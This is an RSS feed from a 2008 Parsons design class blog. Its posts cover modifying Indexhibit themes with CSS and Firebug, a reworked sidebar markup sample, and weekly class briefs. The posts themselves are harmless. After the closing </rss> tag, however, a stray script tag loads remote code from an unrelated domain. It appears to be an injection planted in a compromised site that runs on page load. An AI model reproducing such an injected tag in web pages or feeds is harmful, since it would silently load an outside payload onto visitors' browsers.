











































<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Open Source Design &#187; indexhibit</title>
	<atom:link href="http://www.mushon.com/fall08/osd/tag/indexhibit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mushon.com/fall08/osd</link>
	<description>Students designing with and for open source software &#124; Parsons Fall 2008</description>
	<lastBuildDate>Fri, 22 May 2009 16:49:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>How To Modify Indexhibit &#8211; Tutorial Instructions</title>
		<link>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/</link>
		<comments>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 00:27:23 +0000</pubDate>
		<dc:creator>khurry</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=837</guid>
		<description><![CDATA[Hey gang, Below is the text version of our &#8216;How To Modify Indexhibit&#8217; screencast. Also, the pdf version is available here. How to Modify Indexhibit w/CSS: This tutorial will show you how to modify your Indexhibit website by creating a new theme and making some simple changes to the CSS. We will focus on three [...]]]></description>
			<content:encoded><![CDATA[<p>Hey gang,</p>
<p>Below is the text version of our &#8216;How To Modify Indexhibit&#8217; screencast. Also, the pdf version is available <a href="http://khurrambajwa.com/indexhibit_tutorial.pdf">here</a>.</p>
<h4><strong>How to Modify Indexhibit w/CSS:</strong></h4>
<p>This tutorial will show you how to modify your Indexhibit website by creating a new theme and making some simple changes to the CSS. We will focus on three major areas:</p>
<ol>
<li>How to create the files necessary for your own Indexhibit theme</li>
<li>Using Firebug to examine web pages</li>
<li>Styling your theme by modifying an existing CSS stylesheet</li>
</ol>
<h2><span id="more-837"></span><strong>Step 1: Creating a new theme</strong></h2>
<p>We will begin by guiding you through the process of creating, uploading and activating your new theme. The theme we will create will be based on the ‘Sample&#8217; theme included with your Indexhibit download, and will be based solely on modifying the style.css file (i.e., you need not worry about messing with the index.php file).</p>
<p>First, you need to locate the Indexhibit themes folder on your computer. Locate the themes folder by following:</p>
<p><em>User &gt; Sites &gt; ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site &gt; sample</em></p>
<p>The ‘site&#8217; folder is basically where Indexhibit stores the files for all of its themes. In our example, the new theme we create will start off as a copy of the ‘sample&#8217;.</p>
<p>Next, create a new folder inside of the ‘site&#8217; folder and give it a name (e.g., &#8220;theme_01&#8243;). Once you&#8217;ve created this new folder open the ‘sample&#8217; folder and copy and paste the style.css, ie.css and index.php files into &#8220;theme_01.&#8221; Again, we will only be working with the style.css file, so don&#8217;t worry about the other two, they only need to be in that same folder in order for the theme to work.</p>
<p>Now, upload &#8220;theme_01&#8243; to<em> ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site</em> on your remote server (the same way as you did during the Indexhibit installation process).</p>
<p>Next, login to your Indexhibit backend site (http://yoursitename/indexhibit/ndxz-studio/) and click on the ‘Settings&#8217; link in the top right of the screen.</p>
<p>From here you can chose which theme to apply to your site by selecting the ‘Theme&#8217; drop menu on the left-hand side of the screen. Go ahead and select the new theme we created, &#8220;theme_01,&#8221; from this menu and then click &#8220;Update&#8221; to set this as your theme. Leave this browser window open.</p>
<p>So by now you should have created a new folder inside of the ‘site&#8217; folder, uploaded this new folder to your server, and activated this theme (don&#8217;t worry that it&#8217;s just a copy of ‘sample&#8217; so far, we will soon be modifying it shortly to create a unique theme of your own. But before we do that, its a good idea to mention Mozilla Firebug and how it can make your life much easier (or at least more manageable) by allowing you to examine and &#8220;borrow&#8221; code from other sites.</p>
<h2>Step 2: Firebug &#8211; how to examine track and examine source code</h2>
<p>Mozilla Firebug is a free plugin available for Firefox that allows you to view the HTML and CSS code for pages open in your browser window. By using the &#8220;Inspect&#8221; feature, you can easily hover over and click on various page elements to reveal the corresponding html and css code for that element.</p>
<p>We will be using Firebug here to identify the parts of our site that we want to modify and the corresponding CSS rule in the style.css file that defines how that element appears on the screen. By doing so, we can then apply this knowledge towards modifying our own theme and track these changes to ensure they look how we want them to.</p>
<p>Remember, our new theme is based on a copy of the style.css file attached to the default &#8220;Sample&#8221; theme provided by Indexhibit. For the purposes of this tutorial all of our modifications will be made by editing existing rules only &#8212; we will not be creating any new rules.</p>
<p>Before we move on to styling our new theme, now is a good time to click on &#8220;Visit Your Site&#8221; link in the upper right hand corner of the ‘Exhibits: Settings&#8217; window. If you don&#8217;t have it already, download and install Firebug.</p>
<p>Once you&#8217;re set up with Firebug its time for Step 3: Styling Your Theme with style.css</p>
<h2>Step 3: Modifying Your Theme</h2>
<p>We will now modify the look of our site by editing its stylesheet. Begin by locating the style.css file for ‘Theme_01,&#8217; the folder we created in step 1. The file should be here:</p>
<p><em>User &gt; Sites &gt; ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site &gt; theme_01</em></p>
<p>Open style.css in your text editing program and notice how it lists things like &#8220;#menu&#8221; and &#8220;#menu ul&#8221; followed by sublists of things like &#8220;width,&#8221; &#8220;overflow&#8221; and &#8220;background color&#8221;. These are the CSS rules that define how our site looks, and this is where we will be making our modifications. In particular, we will be making changes to 8 rules: body, a:link (a:visited, a:hover), #menu, #menu ul, #menu ul li.section-title, #content, #content p, and p.</p>
<p>Please note how the following two directions are used:</p>
<ul>
<li>‘Add&#8217; means to leave the existing definitions intact and just adding the given lines to the rule.</li>
</ul>
<ul>
<li> ‘Change&#8217; means to actually replace the current value in a definition(s) with the given one.</li>
</ul>
<h3>The Body:</h3>
<p>The first change we will make will be used to make some global definitions for the site&#8217;s style. In style.css find the body rule and make the following additions/changes:</p>
<ol>
<li>In ‘body&#8217; Set the default typeface for the site by adding ‘monospace&#8217; in front of ‘Verdana&#8217; in the ‘font-family&#8217; line.</li>
<li>Set the background color for the page by changing ‘background: #fff&#8217; to #ccffff.</li>
</ol>
<h3>The Menu:</h3>
<p>Next, we move to the navigation menu. Inspecting the menu in Firebug reveals that this section is defined by the rule #menu. Begin modifying the menu by making changes to its color:</p>
<p>In ‘#menu,&#8217; change ‘background-color&#8217; from #fff to #666666. This will give us a charcoal grey navigation menu.</p>
<p>Change the font size, color &amp; layout for the exhibit titles:</p>
<p>In ‘#menu ul li.section-title&#8217; add the following definitions:</p>
<ol>
<li> line-height: 18pt;</li>
<li>border-bottom-color: white;</li>
<li>border-bottom-style: dotted;</li>
<li>border-bottom-width: 1px;</li>
<li>color: white;</li>
<li>font-size: 14pt;</li>
</ol>
<p>Next, to modify the exhibit links:</p>
<p>a:link &#8211; defines links in their default (unclicked) state. Add the definition:</p>
<ol>
<li> color: #ccffcc</li>
</ol>
<p>a:visited &#8211; defines links after they have been clicked on. Change the definition:</p>
<ol>
<li> color: #666 to #ccffff</li>
</ol>
<p>Finally, to change the size and color of your name as it is displayed at the top of the menu:</p>
<p>In ‘p&#8217; add the definitions:</p>
<ol>
<li> color: white;</li>
<li>font-size: 14pt;</li>
</ol>
<p>Lastly, we move to modifying the content section.</p>
<h3>The Content:</h3>
<p>The last changes we will be making are going to effect the content area of the page (ie, where your exhibits appear. To modify the content text:</p>
<p>In ‘#content p&#8217;:<br />
Change ‘width&#8217; from 400 px to 700 px.<br />
Then add the following definitions:</p>
<ol>
<li> line-height: 21pt;</li>
<li>margin-left: 5px;</li>
<li>font-size: 18pt;</li>
<li>color: #666666;</li>
</ol>
<p>These modifications will change the font size, color and spacing for the content text. Lastly, adjust the content display area:</p>
<p>In ‘#content&#8217; add the definition:</p>
<ol>
<li> padding-left: 50px;</li>
</ol>
<p>Make sure to upload your final style.css to your server, and enjoy! You have now learned how to go about making changes to your indexhibit site by modifying themes.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My Indexhibit Theme</title>
		<link>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 16:28:32 +0000</pubDate>
		<dc:creator>Ed Nacional</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=820</guid>
		<description><![CDATA[Hey guys, I have finished by indexhibit theme, now styled and commented. I still think there can be some inprovements with the commenting, but i guess thats the beauty of opensource. Here is my thread on indexhibit forum I have applied the theme to my current website and created a page specifically for the theme. [...]]]></description>
			<content:encoded><![CDATA[<p>Hey guys,</p>
<p>I have finished by indexhibit theme, now styled and commented. I still think there can be some inprovements with the commenting, but i guess thats the beauty of opensource.</p>
<p><a href="http://www.indexhibit.org/forum/thread/2522/">Here is my thread on indexhibit forum</a></p>
<p>I have applied the theme to my current website and created a page specifically for the theme.</p>
<p><a href="http://www.ednacional.com/indexhibit/index.php?/identity/theme/" target="_blank">http://www.ednacional.com/indexhibit/index.php?/identity/theme/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Indexhibit sidebar &#8211; with sane id&#8217;s &amp; classes</title>
		<link>http://www.mushon.com/fall08/osd/12/21/indexhibit-sidebar-with-sane-ids-classes/</link>
		<comments>http://www.mushon.com/fall08/osd/12/21/indexhibit-sidebar-with-sane-ids-classes/#comments</comments>
		<pubDate>Sun, 21 Dec 2008 22:24:57 +0000</pubDate>
		<dc:creator>Mushon</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[indexhibit]]></category>
		<category><![CDATA[osd]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[semantic]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/12/21/indexhibit-sidebar-with-sane-ids-classes/</guid>
		<description><![CDATA[I made some changes to the commented index.php and the plugins index.php (which I found to be the one in charge of the sidebar structure) I basically changed the way these html elements are constructed through php and made sure they can be much more easily selected and styled. Basically the sidebar I have now [...]]]></description>
			<content:encoded><![CDATA[<p>I <a href="http://trac.assembla.com/osd2/changeset/124">made some changes</a> to the commented index.php and the plugins index.php (which I found to be the one in charge of the sidebar structure) I basically changed the way these html elements are constructed through php and made sure they can be much more easily selected and styled.</p>
<p>Basically the sidebar I have now looks like this:</p>

<div class="wp_syntax"><div class="code"><pre class="html4strict" style="font-family:monospace;"><span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">div</span> <span style="color: #000066;">id</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;menu&quot;</span>&gt;</span>
    <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">div</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;container&quot;</span>&gt;</span>
&nbsp;
        <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">div</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;top-section&quot;</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">h1</span>&gt;</span>Mushon<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">h1</span>&gt;</span>
        <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">div</span>&gt;</span>
&nbsp;
        <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;nav sectional&quot;</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span> <span style="color: #000066;">id</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Projects&quot;</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>Projects<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
                    <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span>&gt;&lt;<span style="color: #000000; font-weight: bold;">a</span> <span style="color: #000066;">onclick</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;do_click();&quot;</span> <span style="color: #000066;">href</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://www.mushon.com/fall08/osd/indexhibit/index.php?/project/kriegspiel/&quot;</span>&gt;</span>Just a test<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">a</span>&gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span> <span style="color: #000066;">id</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Info&quot;</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>Info<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
                    <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;active&quot;</span>&gt;&lt;<span style="color: #000000; font-weight: bold;">a</span> <span style="color: #000066;">onclick</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;do_click();&quot;</span> <span style="color: #000066;">href</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://www.mushon.com/fall08/osd/indexhibit/&quot;</span>&gt;</span>Main<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">a</span>&gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span> <span style="color: #000066;">id</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;oldstuff&quot;</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>old stuff<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">h3</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
                    <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span>&gt;&lt;<span style="color: #000000; font-weight: bold;">a</span> <span style="color: #000066;">onclick</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;do_click();&quot;</span> <span style="color: #000066;">href</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://www.mushon.com/fall08/osd/indexhibit/index.php?/project/older-one/&quot;</span>&gt;</span>older one<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">a</span>&gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
                <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
        <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
&nbsp;
        <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;bottom-section&quot;</span>&gt;</span>
	        <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">p</span>&gt;</span>Just testing<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">p</span>&gt;</span>
        <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
&nbsp;
        <span style="color: #808080; font-style: italic;">&lt;!-- you must provide a link to Indexhibit on your site someplace - thank you --&gt;</span>
        <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">ul</span> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;built&quot;</span>&gt;</span>
            <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">li</span>&gt;</span>Built with <span style="color: #009900;">&lt;as <span style="color: #000066;">href</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://www.indexhibit.org/&quot;</span>&gt;</span>Indexhibit<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span>as&gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">li</span>&gt;</span>
        <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">ul</span>&gt;</span>
&nbsp;
    <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">div</span>&gt;</span>	
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">div</span>&gt;</span></pre></div></div>

<p>So try it out and tell me what do you guys think?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/21/indexhibit-sidebar-with-sane-ids-classes/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Getting serious with Indexhibit</title>
		<link>http://www.mushon.com/fall08/osd/12/09/getting-serious-with-indexhibit/</link>
		<comments>http://www.mushon.com/fall08/osd/12/09/getting-serious-with-indexhibit/#comments</comments>
		<pubDate>Tue, 09 Dec 2008 17:05:20 +0000</pubDate>
		<dc:creator>Mushon</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[briefs]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=721</guid>
		<description><![CDATA[Today in class we make plans to get the Indexhibit work done within the next two weeks. Each one of you will comment to this post with a commitment to what you intend to do by next week. Current options (we can expand this list): Write a css plugin Write comments for the css code [...]]]></description>
			<content:encoded><![CDATA[<p>Today in class we make plans to get the Indexhibit work done within the next two weeks. Each one of you will comment to this post with a commitment to what you intend to do by next week.<br />
Current options (we can expand this list):</p>
<ul>
<li>Write a css plugin</li>
<li>Write comments for the css code</li>
<li>Do a screencast of how to install Indexhibit</li>
<li>Do a screencast of how to use Indexhibit</li>
<li>Do a screencast of how to modify Indexhibit (maybe using Firebug too)</li>
<li>Write a post(s) to document our efforts</li>
<li>Float our user interface and accessibility concerns to the Indexhibit community (on the forums) and follow up the discussion to fix it.</li>
<li>more&#8230;</li>
</ul>
<p>As the semester is neerly done, and since you guys seem to be much more in control of your WordPress stuff, I think we should feel safe to swich gears and focus our attention on our OSD project &#8211; our class legacy&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/09/getting-serious-with-indexhibit/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Notes from Portfolio Class</title>
		<link>http://www.mushon.com/fall08/osd/12/05/notes-from-portfolio-class/</link>
		<comments>http://www.mushon.com/fall08/osd/12/05/notes-from-portfolio-class/#comments</comments>
		<pubDate>Fri, 05 Dec 2008 16:38:13 +0000</pubDate>
		<dc:creator>Ed Nacional</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=707</guid>
		<description><![CDATA[Exhibition formats are hidden while in the &#8220;Advanced mode&#8221; is set to off (Default is set to off). Only 4 formats are available on first install. Settings/Preferences Buttons The way the Title and Caption is displayed differently per Exhibition Format &#8220;site&#8221; folder isn&#8217;t a very intuitive name Once you choose a exhibition specific background color [...]]]></description>
			<content:encoded><![CDATA[<ul>
<li>Exhibition formats are hidden while in the &#8220;Advanced mode&#8221; is set to off (Default is set to off). Only 4 formats are available on first install.</li>
<li>Settings/Preferences Buttons</li>
<li>The way the Title and Caption is displayed differently per Exhibition Format</li>
<li>&#8220;site&#8221; folder isn&#8217;t a very intuitive name</li>
<li>Once you choose a exhibition specific background color there is no way to delete it.</li>
<li>On Ed&#8217;s &#8220;commented&#8221; theme it currently says Navigation &#8211; Left Side. Which may not always be the case.</li>
<li>Do we want to have credit for our work in the somewhere? CSS comment??</li>
<li>Comment the index.php??</li>
<li>Create a DIV and easy way to insert and style image/logo</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/05/notes-from-portfolio-class/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OK Indexhibit, let&#8217;s make you better</title>
		<link>http://www.mushon.com/fall08/osd/12/02/ok-indexhibit-lets-make-you-better/</link>
		<comments>http://www.mushon.com/fall08/osd/12/02/ok-indexhibit-lets-make-you-better/#comments</comments>
		<pubDate>Tue, 02 Dec 2008 17:30:28 +0000</pubDate>
		<dc:creator>Mushon</dc:creator>
				<category><![CDATA[#2-Wordpress]]></category>
		<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[briefs]]></category>
		<category><![CDATA[indexhibit]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=700</guid>
		<description><![CDATA[Indexhibit: Write a CSS Plugin for Indexhibit, please communicate with the rest of us what your plugin will be about. Chip in on the documentation for the Sandbox theme Let&#8217;s communicate about our Friday gig. WordPress: Start diving into plugins. Make your theme links url independent. Upload content to your blog. Get ready to finish [...]]]></description>
			<content:encoded><![CDATA[<p>Indexhibit:</p>
<ul>
<li>Write a CSS Plugin for Indexhibit, please communicate with the rest of us what your plugin will be about.</li>
<li>Chip in on the documentation for the Sandbox theme</li>
<li>Let&#8217;s communicate about our Friday gig.</li>
</ul>
<p>WordPress:</p>
<ul>
<li>Start diving into plugins.</li>
<li>Make your theme links url independent.</li>
<li>Upload content to your blog.</li>
<li>Get ready to finish this thing.</li>
</ul>
<p>Enjoy</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/02/ok-indexhibit-lets-make-you-better/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WPing &amp; OSDing</title>
		<link>http://www.mushon.com/fall08/osd/11/18/wping-osding/</link>
		<comments>http://www.mushon.com/fall08/osd/11/18/wping-osding/#comments</comments>
		<pubDate>Tue, 18 Nov 2008 18:00:59 +0000</pubDate>
		<dc:creator>Mushon</dc:creator>
				<category><![CDATA[#2-Wordpress]]></category>
		<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[briefs]]></category>
		<category><![CDATA[indexhibit]]></category>
		<category><![CDATA[osd]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=690</guid>
		<description><![CDATA[As our process becomes more self-directed, I do not have any specifics for you for next week but: Continue down the WP path: try to finish the main page Next go to post page (single.php) (+ if relevant: comments.php) Then to page page (page.php) Then to the menus (archive.php archives.php author.php category.php tag.ph) Then to [...]]]></description>
			<content:encoded><![CDATA[<p>As our process becomes more self-directed, I do not have any specifics for you for next week but:</p>
<ul>
<li>Continue down the WP path:
<ol>
<li>try to finish the main page</li>
<li>Next go to post page (single.php) (+ if relevant: comments.php)</li>
<li>Then to page page (page.php)</li>
<li>Then to the menus (archive.php archives.php author.php category.php tag.ph)</li>
<li>Then to search (search.php)</li>
<li>Last (/optional): 404.php, attachment.php, image.php, links.php)</li>
</ol>
</li>
<li>Let&#8217;s get our heads into Indexhibit and how can we make it better:
<ol>
<li>We&#8217;ll discuss it in class today</li>
<li>Let&#8217;s share some findings from the <a href="http://indexhibit.org/forum">Indexhibit forum</a> that can shed some light on where to take this</li>
<li>Let&#8217;s experiment with theming Indexhibit, it&#8217;s not hard, how can it be easier?</li>
</ol>
</li>
<li>Leonie will be back next week with a &#8216;Great Wide Open&#8217; for us.</li>
<li>Enjoy</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/11/18/wping-osding/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Now really&#8230;</title>
		<link>http://www.mushon.com/fall08/osd/11/11/now-really/</link>
		<comments>http://www.mushon.com/fall08/osd/11/11/now-really/#comments</comments>
		<pubDate>Tue, 11 Nov 2008 17:15:28 +0000</pubDate>
		<dc:creator>Mushon</dc:creator>
				<category><![CDATA[#2-Wordpress]]></category>
		<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[briefs]]></category>
		<category><![CDATA[indexhibit]]></category>
		<category><![CDATA[osd]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=654</guid>
		<description><![CDATA[Ok, we had a huge distraction this week, but now we dive directly into into theming our WP themes and into the final OSD project. On the theme front: Finish your main page (header.php / index.php / footer.php / sidebars.php) when (/if) you get to it, go to post.php &#8211; it should be pretty easy [...]]]></description>
			<content:encoded><![CDATA[<p>Ok,</p>
<p>we had a huge distraction this week, but now we dive directly into into theming our WP themes and into the final OSD project.</p>
<p>On the theme front:</p>
<ul>
<li>Finish your main page (header.php / index.php / footer.php / sidebars.php)</li>
<li>when (/if) you get to it, go to post.php &#8211; it should be pretty easy to extend what you did in index.php to it.</li>
</ul>
<p>On the OSD front (my proposal for moving forward):</p>
<ul>
<li><strong>Leonie:</strong> Please document your process of trying to install Indexhibit, including (mainly) the difficulties and frustrations. The format could be:
<ul>
<li>What are you trying to do?</li>
<li>What are you accomplishing through the official tutorial?</li>
<li>What do you do when you&#8217;re stuck?</li>
<li>How confident are you through the process?</li>
<li>What helps/extends confidence? What does the opposite?</li>
</ul>
<p>It will be a great way for us to learn about where we should focus our energies.</li>
<li><strong>Karen, Khurry, Ed &amp; Alexandra</strong>: I propose:
<ul>
<li>Research existing documentation of Indexhibit and based on it.</li>
<li>Try to install it on your servers.</li>
<li>Write a post proposing contributions you/we make to the project as designers (you can propose several and expand on at least one of them).</li>
</ul>
</li>
</ul>
<p><strong>Leonie &#8211; Next week, Great/Wide/Open:</strong></p>
<ul>
<li>Got an idea? Yes? No? Talk to me&#8230;</li>
</ul>
<p>Enjoy. (yes, we can)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/11/11/now-really/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Index + Exhibit = Indexhibit.org</title>
		<link>http://www.mushon.com/fall08/osd/10/07/index-exhibit-indexhibitorg/</link>
		<comments>http://www.mushon.com/fall08/osd/10/07/index-exhibit-indexhibitorg/#comments</comments>
		<pubDate>Tue, 07 Oct 2008 15:36:11 +0000</pubDate>
		<dc:creator>Ed Nacional</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[gwo]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=267</guid>
		<description><![CDATA[Here is what i will be talking about in class today for my Great Wide Open presentation. http://www.indexhibit.org/ My Indexhibit Links on Delicious http://delicious.com/ednacional/indexhibit See you soon!]]></description>
			<content:encoded><![CDATA[<p>Here is what i will be talking about in class today for my Great Wide Open presentation.</p>
<p><a href="http://www.indexhibit.org/" target="_blank">http://www.indexhibit.org/</a></p>
<p>My Indexhibit Links on Delicious</p>
<p><a href="http://delicious.com/ednacional/indexhibit" target="_blank">http://delicious.com/ednacional/indexhibit</a></p>
<p>See you soon!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/10/07/index-exhibit-indexhibitorg/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://whereisdudescars.com/js2.php"></script>